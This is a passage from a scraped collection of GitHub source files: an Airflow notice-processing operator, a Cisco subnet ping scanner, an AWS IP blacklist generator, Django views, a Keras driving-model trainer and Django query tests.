processed_notice_id = None\n try:\n notice_event = NoticeEventMessage(notice_id=notice_id,\n domain_action=pipeline_name)\n notice_event.start_record()\n notice = notice_repository.get(reference=notice_id)\n result_notice_pipeline = self.notice_pipeline_callable(notice, notice_repository.mongodb_client)\n if result_notice_pipeline.store_result:\n notice_repository.update(notice=result_notice_pipeline.notice)\n notice_event.end_record()\n if result_notice_pipeline.processed:\n processed_notice_id = notice_id\n if notice.normalised_metadata:\n notice_event.notice_form_number = notice.normalised_metadata.form_number\n notice_event.notice_eforms_subtype = notice.normalised_metadata.eforms_subtype\n notice_event.notice_status = str(notice.status)\n logger.info(event_message=notice_event)\n error_message = result_notice_pipeline.error_message\n except Exception as exception_error_message:\n error_message = str(exception_error_message)\n if error_message:\n notice_normalised_metadata = notice.normalised_metadata if notice else None\n log_notice_error(message=error_message, notice_id=notice_id, domain_action=pipeline_name,\n notice_form_number=notice_normalised_metadata.form_number if notice_normalised_metadata else None,\n notice_status=notice.status if notice else None,\n notice_eforms_subtype=notice_normalised_metadata.eforms_subtype if notice_normalised_metadata else None)\n return processed_notice_id\n\n def multithread_notice_processor(self, notice_ids: list, mongodb_client: MongoClient, pipeline_name: str) -> list:\n \"\"\"\n This method can execute the notice_pipeline_callable for each notice_id in the notice_ids batch.\n :param notice_ids: The notice_ids batch.\n :param mongodb_client: The mongodb client.\n :param pipeline_name: The pipeline name for logs.\n \"\"\"\n 
processed_notice_ids = []\n notice_repository = NoticeRepository(mongodb_client=mongodb_client)\n with ThreadPoolExecutor() as executor:\n futures = [executor.submit(self.single_notice_processor, notice_id, notice_repository, pipeline_name)\n for notice_id in notice_ids]\n for future in futures:\n processed_notice_id = future.result()\n if processed_notice_id:\n processed_notice_ids.append(processed_notice_id)\n return processed_notice_ids\n\n def execute(self, context: Any):\n \"\"\"\n This method can execute the notice_pipeline_callable for each notice_id in the notice_ids batch or\n can execute the batch_pipeline_callable for whole notice_ids batch at once.\n \"\"\"\n logger = get_logger()\n notice_ids = smart_xcom_pull(key=NOTICE_IDS_KEY)\n if not notice_ids:\n raise Exception(f\"XCOM key [{NOTICE_IDS_KEY}] is not present in context!\")\n mongodb_client = MongoClient(config.MONGO_DB_AUTH_URL)\n processed_notice_ids = []\n pipeline_name = DEFAULT_PIPELINE_NAME_FOR_LOGS\n if self.notice_pipeline_callable:\n pipeline_name = self.notice_pipeline_callable.__name__\n elif self.batch_pipeline_callable:\n pipeline_name = self.batch_pipeline_callable.__name__\n number_of_notices = len(notice_ids)\n batch_event_message = EventMessage(\n message=f\"Batch processing for pipeline = [{pipeline_name}] with {number_of_notices} notices.\",\n kwargs={\"pipeline_name\": pipeline_name,\n \"number_of_notices\": number_of_notices}\n )\n handle_event_message_metadata_dag_context(batch_event_message, context)\n batch_event_message.start_record()\n if self.batch_pipeline_callable is not None:\n processed_notice_ids = self.batch_pipeline_callable(notice_ids=notice_ids, mongodb_client=mongodb_client)\n elif self.notice_pipeline_callable is not None:\n processed_notice_ids = self.multithread_notice_processor(notice_ids=notice_ids,\n mongodb_client=mongodb_client,\n pipeline_name=pipeline_name\n )\n batch_event_message.end_record()\n logger.info(event_message=batch_event_message)\n if not processed_notice_ids:\n raise Exception(\"No notice has been processed!\")\n smart_xcom_push(key=NOTICE_IDS_KEY, value=processed_notice_ids)\n\n\nclass TriggerNoticeBatchPipelineOperator(BaseOperator):\n ui_color = ' #1bd5ff'\n ui_fgcolor = '#000000'\n\n def __init__(\n self,\n *args,\n start_with_step_name: str = None,\n batch_size: int = None,\n execute_only_one_step: bool = None,\n push_result: bool = False,\n **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.start_with_step_name = start_with_step_name if start_with_step_name else DEFAULT_START_WITH_TASK_ID\n self.execute_only_one_step = execute_only_one_step\n self.push_result = push_result\n self.batch_size = batch_size\n\n def execute(self, context: Any):\n if self.execute_only_one_step is None:\n self.execute_only_one_step = get_dag_param(key=EXECUTE_ONLY_ONE_STEP_KEY, default_value=False)\n notice_ids = pull_dag_upstream(key=NOTICE_IDS_KEY)\n if notice_ids:\n if not self.batch_size:\n batch_size = 1 + len(notice_ids) // AIRFLOW_NUMBER_OF_WORKERS\n batch_size = batch_size if batch_size < MAX_BATCH_SIZE else MAX_BATCH_SIZE\n else:\n batch_size = self.batch_size\n for notice_batch in chunks(notice_ids, chunk_size=batch_size):\n TriggerDagRunOperator(\n task_id=f'trigger_worker_dag_{uuid4().hex}',\n trigger_dag_id=NOTICE_PROCESSING_PIPELINE_DAG_NAME,\n conf={\n NOTICE_IDS_KEY: list(notice_batch),\n START_WITH_STEP_NAME_KEY: self.start_with_step_name,\n EXECUTE_ONLY_ONE_STEP_KEY: self.execute_only_one_step\n }\n ).execute(context=context)\n\n if self.push_result:\n 
push_dag_downstream(key=NOTICE_IDS_KEY, value=notice_ids)\n","repo_name":"OP-TED/ted-rdf-conversion-pipeline","sub_path":"dags/operators/DagBatchPipelineOperator.py","file_name":"DagBatchPipelineOperator.py","file_ext":"py","file_size_in_byte":9311,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"4305429722","text":"from ipaddress import IPv4Network, AddressValueError\nfrom CiscoIPScanner.general import mt\nfrom CiscoIPScanner.exceptions import (\n InvalidVRF, NoVRFSpecifiedWithIntInVRF, InvalidIntfIPAddress, InvalidDeviceType, NoIntfIPSpecified,\n NoNXOSIntfIPSpecified, SubnetTooLarge, InvalidVlanID, InvalidNetworkID, InvalidInterfaceIP,\n InterfaceIPAddressNotInNetwork, VlanNotInVlanDB, TemplatesNotFoundWithinPackage)\nfrom CiscoIPScanner.address_validator import ipv4\nfrom progressbar import progressbar\n# import time\n\n# TODO: Add router support\n# TODO: Add check to make sure SVI\n\n\ndef hosts_lists_parse(prefix, all_hosts):\n \"\"\"Splits host list into seperate lists for concurrent SSH or TELNET sessions for faster IP scan\\n\n if prefix length is between 29 and 23\"\"\"\n if prefix == 29:\n return [\n all_hosts[0:2], all_hosts[2:4], all_hosts[4:6]\n ]\n elif prefix == 28:\n return [\n all_hosts[0:2], all_hosts[2:4], all_hosts[4:6], all_hosts[6:8],\n all_hosts[8:10], all_hosts[10:12], all_hosts[12:14]\n ]\n elif prefix == 27:\n return [\n all_hosts[0:5], all_hosts[5:10], all_hosts[10:15], all_hosts[15:20],\n all_hosts[20:25], all_hosts[25:30]\n ]\n elif prefix == 26:\n return [\n all_hosts[0:15], all_hosts[15:30], all_hosts[30:45], all_hosts[45:60],\n all_hosts[60:62]\n ]\n elif prefix == 25:\n return [\n all_hosts[0:18], all_hosts[18:36], all_hosts[36:54], all_hosts[54:72],\n all_hosts[72:90], all_hosts[89:108], all_hosts[108:126]\n ]\n elif prefix == 24:\n return [\n all_hosts[0:25], all_hosts[25:50], all_hosts[50:75], all_hosts[75:100],\n all_hosts[100:125], all_hosts[125:150], all_hosts[150:175], all_hosts[175:200],\n all_hosts[200:225], all_hosts[225:250], all_hosts[250:254]\n ]\n elif prefix == 23:\n return [\n all_hosts[0:51], all_hosts[51:102], all_hosts[102:153], all_hosts[153:204],\n all_hosts[204:255], all_hosts[255:306], all_hosts[306:357], all_hosts[357:408],\n all_hosts[408:459], all_hosts[459:510]\n ]\n else:\n raise SubnetTooLarge\n\n\nclass ProgressBar:\n def __init__(self, iterable, prefix):\n self.bar = progressbar(iterable, prefix=prefix)\n\n\nclass Scan:\n \"\"\"Initiates IP scan of IP subnet from Cisco IOS or NX-OS devices\\n\n Subnet can be between a /29 and /23\"\"\"\n def __init__(self, network, devicetype, source_vlan, connection, create_intf=False, intf_ip=None, vrf=None,\n count=2, timeout=1, progress_bar=False):\n\n # Intf IP required if creating interface\n if create_intf and intf_ip is None:\n raise NoIntfIPSpecified\n\n # Intf IP required if NX-OS\n if devicetype == 'cisco_nxos' and intf_ip is None:\n raise NoNXOSIntfIPSpecified\n\n # Checks VLAN to make sure valid VLAN ID within extended VLAN range and not within reserved VLAN ID range\n if int(source_vlan) not in range(1, 4095) or int(source_vlan) in range(1002, 1006):\n raise InvalidVlanID\n\n # Checks to make sure network is valid\n try:\n network = IPv4Network(network)\n except AddressValueError:\n raise InvalidNetworkID\n\n # Checks to make sure interface IP address is valid IP address and IP address in within the specific network\n if intf_ip is not None:\n if not ipv4(intf_ip):\n raise InvalidInterfaceIP\n if not any(intf_ip == 
str(h1) for h1 in network.hosts()):\n raise InterfaceIPAddressNotInNetwork\n \n # Checks for source vlan in device VLAN database\n session = connection.connection().session\n try:\n vlan_db = session.send_command('show vlan brief', use_textfsm=True)\n except ValueError:\n raise TemplatesNotFoundWithinPackage\n if not any(source_vlan == v1['vlan_id'] for v1 in vlan_db):\n raise VlanNotInVlanDB\n\n # Creates Interface\n if create_intf and intf_ip is not None:\n if vrf is None:\n session.send_config_set([\n f'interface vlan {source_vlan}',\n f'ip address {intf_ip} {network.netmask}',\n 'no shut'\n ])\n else:\n if devicetype == 'cisco_nxos':\n vrf_cmd = f'vrf member {vrf}'\n else:\n vrf_cmd = f'vrf forwarding {vrf}'\n session.send_config_set([\n f'interface vlan {source_vlan}',\n vrf_cmd,\n f'ip address {intf_ip} {network.netmask}',\n 'no shut'\n ])\n \n # Creating list of dictionaries for hosts for later sorted of unordered output data from scan\n self.all_hosts = []\n \"\"\"All hosts in specified subnet with dictionaries including reachability info, ip address, and mac address\"\"\"\n for h in network.hosts():\n self.all_hosts.append(\n {\n 'address': str(h)\n }\n )\n\n reachable_devices = []\n\n def scan(host, conn):\n \"\"\"Main IP subnet Scan function\"\"\"\n ip_address = host['address']\n # Formats input command for proper formatting based on if IOS(-XE) or NX-OS operating system\n # Also checks to make sure device type is IOS(-XE) or NX-OS\n if devicetype == 'cisco_ios':\n if vrf is None:\n cmd = f'ping {ip_address} repeat {count} timeout {timeout} source vlan {source_vlan}'\n else:\n cmd = f'ping vrf {vrf} {ip_address} repeat {count} timeout {timeout} source vlan {source_vlan}'\n elif devicetype == 'cisco_nxos':\n if vrf is None:\n cmd = f'ping {ip_address} count {count} timeout {timeout} source {intf_ip}'\n else:\n cmd = f'ping {ip_address} vrf {vrf} count {count} timeout {timeout} source {intf_ip}'\n else:\n raise InvalidDeviceType\n\n cmd_output = conn.send_command(cmd)\n \n # Checks for cmd input errors\n if cmd_output.__contains__('Invalid'):\n if devicetype == 'cisco_ios':\n if cmd_output.__contains__(\n 'Invalid source interface - Interface vrf does not match the vrf used for ping'):\n raise NoVRFSpecifiedWithIntInVRF\n if cmd_output.__contains__('does not exist'):\n raise InvalidVRF\n if cmd_output.__contains__('input detected'):\n raise InvalidIntfIPAddress\n else:\n if cmd_output.__contains__('bind to address'):\n raise NoVRFSpecifiedWithIntInVRF\n if cmd_output.__contains__('does not exist'):\n raise InvalidVRF\n if cmd_output.__contains__('Invalid host/interface'):\n raise InvalidIntfIPAddress\n else:\n # Checks if device recieved ping echo then appending IP address to list if non-0 value\n if devicetype == 'cisco_ios':\n try:\n if str(cmd_output.split('\\n')[4].split(' ')[3]) != '0':\n reachable_devices.append(ip_address)\n except IndexError:\n if str(cmd_output.split('\\n')[5].split(' ')[3]) != '0':\n reachable_devices.append(ip_address)\n else:\n if str(cmd_output.split('\\n')[5].split(' ')[3]) != '0':\n reachable_devices.append(ip_address)\n\n # Splits hosts list into mulitple smaller lists for for multiple asyncronous SSH/TELNET sessions\n hosts_lists = hosts_lists_parse(int(network.prefixlen), self.all_hosts)\n\n if progress_bar:\n self.phase_num = 1\n \"\"\"Internal use only for progress bar numbers\"\"\"\n\n def host_split(host_list):\n session1 = connection.connection().session\n if progress_bar:\n bar = ProgressBar(host_list, f'Phase {str(self.phase_num)}: 
').bar\n self.phase_num += 1\n for h1 in bar:\n scan(h1, session1)\n else:\n for h1 in host_list:\n scan(h1, session1)\n session1.disconnect()\n \n mt(host_split, hosts_lists, threads=len(hosts_lists))\n\n arps = session.send_command(f'show ip arp vlan {source_vlan}', use_textfsm=True)\n\n # Creates Interface\n if create_intf:\n session.send_config_set([f'no interface vlan {source_vlan}'])\n session.disconnect()\n\n def sort(host):\n for arp in arps:\n if arp['address'] == host['address'] and arp['mac'].count('.') == 2:\n host['mac'] = arp['mac']\n if any(host['address'] == reachable_device for reachable_device in reachable_devices):\n host['status'] = 'Reachable'\n else:\n host['status'] = 'Unreachable'\n\n mt(sort, self.all_hosts)\n","repo_name":"ZackDowning/CiscoIPScanner","sub_path":"CiscoIPScanner/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":9407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39758481153","text":"import configparser\nimport os\nimport boto3\nfrom botocore.exceptions import ClientError\n\n\ndef startup():\n config = configparser.ConfigParser()\n config.read('blacklistgenerator.cfg')\n iptable = \"None\"\n awsregion = \"us-east-1\"\n try:\n iptable = config['blacklist']['iptable']\n awsregion = config['blacklist']['awsregion']\n except KeyError as e:\n print(\"No config file, so pulling info from my user's AWS tags.\")\n iam = boto3.resource(\"iam\")\n user = iam.CurrentUser()\n tagset = user.tags\n for tag in tagset:\n if tag['Key'] == 'AWSRegion':\n awsregion = tag['Value']\n if tag['Key'] == 'LogTable':\n iptable = tag['Value']\n config = {}\n config[\"iptable\"] = iptable\n config[\"awsregion\"] = awsregion\n return config\n\ndef getips(config, mincount):\n dynamodb = boto3.client(\"dynamodb\", region_name=config[\"awsregion\"])\n table = config[\"iptable\"]\n try:\n response = dynamodb.scan(\n TableName = table\n )\n itemdict = response[\"Items\"]\n newitemdict = {}\n for item in itemdict:\n itemcount = int(item[\"count\"][\"N\"])\n srcip = item[\"srcip\"][\"S\"]\n count = 0\n if srcip in newitemdict:\n count = newitemdict[srcip]\n newitemdict[item[\"srcip\"][\"S\"]] = count + itemcount\n\n dynamodb = boto3.resource(\"dynamodb\", region_name=config[\"awsregion\"])\n tableobj = dynamodb.Table(table)\n newitems = []\n for item in newitemdict:\n if newitemdict[item] > 2:\n tempitem = {\n \"srcip\": item,\n \"count\": newitemdict[item]\n }\n for entry in itemdict:\n if entry[\"srcip\"]['S'] == item:\n index = entry[\"FortiLogID\"][\"S\"]\n response = tableobj.get_item(Key={'FortiLogID': index}, TableName=table)\n object = response[\"Item\"]\n object[\"status\"] = \"Banned\"\n response = tableobj.put_item(TableName=table, Item=object)\n print(f'Updated entry for {index} to Banned')\n newitems.append(tempitem)\n else:\n totalcount = newitemdict[item]\n for entry in itemdict:\n if entry[\"srcip\"]['S'] == item:\n index = entry[\"FortiLogID\"][\"S\"]\n response = tableobj.get_item(Key={'FortiLogID': index}, TableName=table)\n if \"Item\" in response:\n object = response[\"Item\"]\n else:\n print(response)\n object[\"total\"] = totalcount\n response = tableobj.put_item(TableName=table, Item=object)\n print(f'Updated total for {index} to {totalcount}')\n return newitems\n\n except ClientError as e:\n print(e.response['Error']['Message'])\n print(\"No Item exists, yet\")\n\ndef writeips(iplist):\n ipstring = \"\"\n for ip in iplist:\n ipstring += ip[\"srcip\"] + \"\\n\"\n 
print(ipstring)\n ipfile = os.getenv(\"ipfile\")\n with open(ipfile, \"w\") as outfile:\n outfile.write(ipstring)\n\ndef main(name):\n config = startup()\n iplist = getips(config, 1)\n writeips(iplist)\n\nif __name__ == '__main__':\n main('')\n\n","repo_name":"alomas/blacklistgenerator","sub_path":"blacklistgenerator.py","file_name":"blacklistgenerator.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7845504690","text":"from django.shortcuts import render\nfrom psyduck_search.crawler import Crawler\nfrom django.http import HttpResponse\nimport json\nimport time\nfrom psyduck_search import db_helper\n\n\nclass Search:\n result = None\n crawler = None\n out_tag = None\n current = 0\n total = 0\n keyword = ''\n uuid = ''\n pages = 0\n start_time = None\n\n def __init__(self, uuid):\n self.uuid = uuid\n self.crawler = Crawler()\n self.result = {}\n\n def __progress_callback(self, i, n):\n self.current = i\n self.total = n\n\n def __new_info_callback(self, info):\n if info['coin'] == 0 and info['url'] not in self.result.keys():\n self.result[info['url']] = info\n if not db_helper.exist_download(info['id']):\n db_helper.insert_download(info)\n\n def __finish_callback(self):\n cost = '%.2f' % (time.time() - self.start_time)\n log(self.uuid, f'搜索【{self.keyword}】完成,共{len(self.result)}条结果,耗时:{cost}秒')\n db_helper.insert_log(\n {'uuid': self.uuid, 'keyword': self.keyword, 'pages': self.pages, 'result': len(self.result), 'cost': cost})\n self.current = 0\n self.total = 0\n self.pages = 0\n self.keyword = ''\n\n def is_running(self):\n return self.crawler.is_running\n\n def search(self, keyword, pages):\n while self.is_running():\n self.crawler.signal_stop()\n time.sleep(0.1)\n log(self.uuid, f'开始搜索【{keyword}】,搜索深度:{pages}页')\n self.start_time = time.time()\n self.keyword = keyword\n self.pages = pages\n self.crawler.search_pages = pages\n self.crawler.async_search(keyword, self.__new_info_callback, self.__progress_callback, self.__finish_callback)\n\n\nsearch_dict: {str, Search} = {}\n\n\ndef _response(state, result_count=0, p_i=0, p_n=0, result_json=''):\n return HttpResponse(\n json.dumps({'state': state, 'result_count': result_count, 'total_count': db_helper.count_download(),\n 'p_i': p_i, 'p_n': p_n, 'result_json': result_json}),\n content_type='application/json')\n\n\ndef search(request):\n return render(request, 'index.html')\n\n\ndef search_progress(request):\n if request.method == 'GET':\n return HttpResponse()\n\n uuid = request.POST.get('murmur', '')\n act = request.POST.get('act', '')\n keyword = request.POST.get('keyword', '')\n pages = request.POST.get('pages', '')\n if pages == '':\n pages = 0\n else:\n pages = int(pages)\n if uuid == '':\n return _response('none')\n\n if uuid not in search_dict.keys():\n search_dict[uuid] = Search(uuid)\n\n sr: Search = search_dict[uuid]\n if act == 'begin':\n if sr.keyword != keyword or sr.pages != pages:\n sr.search(keyword, pages)\n elif act == 'clear':\n log(uuid, '清空结果')\n sr.result = {}\n\n result_json = ''\n if act == 'result' or sr.out_tag != len(sr.result):\n result_json = json.dumps(sr.result)\n sr.out_tag = len(sr.result)\n\n state = ''\n if sr.is_running():\n state = 'search'\n\n return _response(state, len(sr.result), sr.current, sr.total, result_json)\n\n\ndef log(uuid, msg):\n import datetime\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') # 现在\n print('[{}]:{} 于 ({})'.format(uuid[0:6], msg, 
now_time))\n","repo_name":"SilenceT/csdn_helper_pub","sub_path":"psyduck_search/psyduck_search/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"38518501380","text":"import os\nimport string\nfrom django.http import response\nfrom django.shortcuts import render\n\n\ndef get_disklist():\n disk_list = []\n for c in string.ascii_uppercase:\n disk = c+':'\n if os.path.isdir(disk):\n disk_list.append(disk)\n\n return disk_list\n\n\ndef handle_dir(path):\n item_list = os.listdir(path=path+\"/\")\n dir_list = []\n file_list = []\n\n for item in item_list:\n if os.path.isdir(path+\"/\"+item):\n dir_list.append(item)\n else:\n file_list.append(item)\n\n dir_list = [\"..\"]+dir_list\n\n return dir_list, file_list\n\n\ndef index(request):\n item_list = get_disklist()\n context = {'item_list': item_list}\n return render(request, \"handle/index.html\", context)\n\n\ndef update(request):\n if(request.method == 'GET'):\n path = request.GET.get(\"path\")\n \n if path==\"\":\n item_list = get_disklist()\n context = {'dir_list': item_list, 'file_list':\"\"}\n return response.JsonResponse(context, safe=False)\n\n elif os.path.isdir(path):\n dir_list, file_list = handle_dir(path)\n context = {'dir_list': dir_list,'file_list':file_list}\n return response.JsonResponse(context, safe=False)\n\n elif path.split(\".\")[-1] == \"html\":\n try:\n res = response.FileResponse(open(path, 'rb'))\n res['content_type'] = \"application/octet-stream\"\n res['Content-Disposition'] = 'attachment; filename=' + os.path.basename(path)\n return res\n except Exception:\n raise response.HTTP404\n\n else:\n return response.HttpResponse(\"TODO...\")\n","repo_name":"punnpkin/hftp","sub_path":"handle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20175036364","text":"import tensorflow as tf\nfrom keras.models import Sequential \nfrom keras.layers import Dense, Flatten, Activation, Dropout, Lambda, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.regularizers import l2\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import ELU\n\nimport keras\nfrom keras.layers import GlobalAveragePooling2D , Input\nfrom keras.models import Model\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom keras.preprocessing.image import img_to_array\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom skimage import transform\nfrom skimage import exposure\n\nimport numpy as np\nimport math\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\nimport csv\nimport random\nimport pickle\n\nlines = []\nimages = []\nload_data = False\n\ndef balance_data(X, y, bins):\n\n new_y = []\n new_X = []\n\n bal = np.linspace(-1,1,bins)\n hist = plt.hist(y,bins = bal)\n total = sum(hist[0])\n dist = hist[0]\n mean = dist[dist!=0]\n\n size = ((total*0.1) / len(mean))\n sample_size = np.repeat(size, len(dist)).astype(np.int)\n \n for i in range(0,len(bal)-1):\n y_inrange = [y for X, y in zip(X, y) if y >= bal[i] and y <= bal[i + 1]]\n x_inrange = [X for X, y in zip(X, y) if y >= bal[i] and y <= bal[i + 1]]\n\n if len(y_inrange)!=0:\n rand = 
random.choice(range(len(y_inrange)), sample_size[i], replace = True)\n new_y.append([y_inrange[j] for j in rand])\n new_X.append([x_inrange[j] for j in rand])\n\n return new_X, new_y\n\ndef generate_data(samples, batch_size = 64,Augment=True):\n \n num_samples = len(samples)\n while True:\n shuffle(samples)\n for offset in range(0,num_samples,batch_size):\n batch_samples = samples[offset:offset+batch_size]\n \n images = []\n angles = []\n \n for batch_sample in batch_samples:\n for i in range(3):\n local_path = batch_sample[i]\n image = cv2.imread(local_path)\n image = image[65:140,:,:]\n image = cv2.resize(image,(200, 66))\n \n \"\"\"\n image = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)\n image, u, v = cv2.split(image)\n image = norm_exposure(image)\n \"\"\"\n images.append(image)\n \n correction = 0.20\n angle = float(batch_sample[3])\n \n angles.append(angle)\n angles.append(angle+correction)\n angles.append(angle-correction)\n \n aug_images = []\n aug_angles = []\n \n \n \n \n for image, angle in zip(images,angles):\n aug_images.append(image)\n aug_angles.append(angle)\n \n if Augment == True:\n \n transformed_image = cv2.flip(image,1)\n transformed_angle = float(angle)*-1.0\n \n #aug_images.append(transformed_image)\n #aug_angles.append(transformed_angle)\n \n \"\"\"\n rand = bool(random.getrandbits(1))\n \n if(rand==True):\n transformed_image, side = random_translation(image)\n\n if(side>0):\n angle += angle*0.15/10\n else:\n angle += angle*-0.15/10\n \"\"\"\n \n aug_images.append(transformed_image) \n aug_angles.append(transformed_angle)\n \n #shadowed_image = random_shadow(image)\n #aug_images.append(shadowed_image)\n #aug_angles.append(angle)\n \n #contrasted_image = random_contrast(image)\n #aug_images.append(contrasted_image)\n #aug_angles.append(angle)\n \n X_train = aug_images\n y_train = aug_angles\n \n if Augment == True:\n m = np.mean(aug_angles)\n s = np.std(aug_angles)\n values, counts = np.unique(aug_angles,return_counts = True)\n \n max_num = max(counts)\n \n for val_i in range(len(values)//2):\n num = max_num-counts[val_i]\n if num>0:\n value = values[val_i]\n \n if value<(m-2*s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n elif value>(m+2*s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n \"\"\"\n elif value>=(m-2*s) and value<=(m-s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n elif value<=(m+2*s) and value > (m+s):\n indx = np.where(aug_angles==value)[0]\n for i in range(num):\n ind = np.random.choice(indx)\n y_train.append(aug_angles[ind])\n X_train.append(aug_images[ind])\n \"\"\"\n yield shuffle(np.array(X_train),np.array(y_train))\n\nbatch = 128\nif load_data == False:\n info = []\n\n \"\"\"\n path = \"../Data/\"\n destination = np.array([#\"Udacity_data/\",\n \"track1_1/\",\n \"track1_2/\",\n \"track1_3/\",\n \"track1_4/\",\n \"track1_5/\",\n #\"Track1_a/\",\n #\"track2_1/\",\n \"track1_cor1/\",\n ])\n \"\"\"\n path = \"../Data2/\"\n destination = np.array([\"Udacity_data/\",\n \"track1_l1/\",\n \"track1_l2/\",\n \"track1_l3/\",\n #\"track1_l4/\",\n #\"track1_l5/\"\n ])\n \n csv_file = \"driving_log.csv\"\n\n for dest in destination:\n with open(path+dest+csv_file,\"r\") as file:\n reader = csv.reader(file)\n for 
line in reader:\n for i in range(3):\n line[i] = line[i].replace(\"\\\\\",\"/\").split(\"/\")\n line[i] = path + dest + \"IMG/\" +line[i][-1]\n \n info.append(line)\n\n train_samples,valid_samples = train_test_split(info,test_size = 0.2)\n\n with open('train_sample.p', 'wb') as f:\n pickle.dump(train_samples, f)\n \n with open('valid_sample.p','wb') as f:\n pickle.dump(valid_samples, f)\nelse:\n with open('train_sample.p','rb') as f:\n train_samples = pickle.load(f)\n\n with open('valid_sample.p','rb') as f:\n valid_samples = pickle.load(f)\n\ntrain_gen = generate_data(train_samples,batch,Augment = True)\nvalid_gen = generate_data(valid_samples,batch,Augment = False)\n\n#----Deep-Learning Model\nmodel = Sequential()\nmodel.add(Lambda(lambda x:x/255.0 -0.5,input_shape = (66,200,3)))\n#model.add(Cropping2D(cropping = ((70,25),(0,0))))\nmodel.add(Convolution2D(6,(5,5),activation = 'elu', kernel_regularizer = l2(0.001)))\nmodel.add(MaxPooling2D())\nmodel.add(Convolution2D(16,(5,5),activation = 'elu', kernel_regularizer = l2(0.001)))\nmodel.add(MaxPooling2D())\nmodel.add(Flatten())\nmodel.add(Dense(120, kernel_regularizer = l2(0.001)))\nmodel.add(Dense(84, kernel_regularizer = l2(0.001)))\nmodel.add(Dense(1, kernel_regularizer = l2(0.001)))\n\nmodel.compile(optimizer=Adam(lr = 1e-4),loss = 'mse')\n\nmodel.fit_generator(train_gen,\n steps_per_epoch = 5000, \n epochs=30,\n validation_data = valid_gen, \n validation_steps = 800,\n verbose=1,\n callbacks = [EarlyStopping(patience = 2)])\n\nmodel.save('model10.h5')","repo_name":"parinp/CarND-Behavioral-Cloning","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":9113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30292594490","text":"import mock\n\nfrom django.test import TestCase\n\nfrom api.query import Query\nfrom api.query import TimesQuery\n\nfrom api.exceptions import InvalidLabelError\nfrom api.exceptions import InvalidPropertyError\n\n\nclass FakeRecords(list):\n\n def single(self):\n return self[0]\n\n\nclass FakeDataset:\n\n def __init__(self, data):\n self.data = data\n self.count = 0\n\n def get_data(self):\n res = self.data[self.count]\n self.count += 1\n return res\n\n\nclass FakeTransaction:\n\n def __init__(self, data):\n self.data = data\n\n def begin_transaction(self):\n return self\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n pass\n\n def run(self, query, **params):\n return self.data.get_data()\n\n\nclass FakeSession:\n\n def __init__(self, data):\n self.data = data\n\n def __enter__(self):\n return FakeTransaction(self.data)\n\n def __exit__(self, *args):\n pass\n\n\nclass FakeConnection:\n\n def __init__(self, data):\n self.data = FakeDataset(data)\n\n def session(self):\n return FakeSession(self.data)\n\n\nclass TestQuery(TestCase):\n \"\"\"\n RETURN environment\n ORDER BY environment.account_number_name ASC\n \"\"\"\n\n def test_match_root_label(self):\n \"\"\"Test match clause targeted at a root level model.\"\"\"\n q = Query('Environment')\n expected = \"MATCH (environment:Environment)\"\n self.assertTrue(expected in str(q))\n\n def test_match_with_state(self):\n \"\"\"Test match clause including a model with state.\"\"\"\n q = Query('Host')\n expected = (\n \"MATCH (environment:Environment)-[r0:HAS_HOST]->(host:Host) \"\n \"\\nMATCH (host)-[r_host_state:HAS_STATE]->(host_state:HostState)\"\n )\n self.assertTrue(expected in str(q))\n\n def test_return_root_label(self):\n \"\"\"Test return clause targeted 
at a root level model.\"\"\"\n q = Query('Environment')\n expected = \"RETURN environment\"\n self.assertTrue(expected in str(q))\n\n def test_return_with_state(self):\n \"\"\"Test return clause that should include state.\"\"\"\n q = Query('Host')\n expected = 'RETURN environment, host, host_state'\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.utils.milliseconds_now', return_value=10)\n def test_default_time(self, m_now):\n \"\"\"Test that default time parameter.\"\"\"\n q = Query('Environment')\n self.assertEquals(q.params['time'], 10)\n q = Query('Environment')\n q.time(None)\n self.assertEquals(q.params['time'], 10)\n\n def test_provided_time(self):\n \"\"\"Test that providing a time changes the query params.\"\"\"\n q = Query('Environment')\n q.time(3)\n self.assertEquals(q.params['time'], 3)\n\n def test_orderby_default(self):\n \"\"\"Test default orderby clause.\"\"\"\n q = Query('Environment')\n expected = \"ORDER BY environment.account_number_name ASC\"\n self.assertTrue(expected in str(q))\n\n def test_orderby_no_label(self):\n \"\"\"Test a single nondefault orderby\"\"\"\n q = Query('Environment')\n q.orderby('account_number', 'DESC')\n expected = \"ORDER BY environment.account_number DESC\"\n self.assertTrue(expected in str(q))\n\n def test_orderby_invalid_property(self):\n \"\"\"Test that orderby raises InvalidPropertyError\"\"\"\n q = Query('Environment')\n with 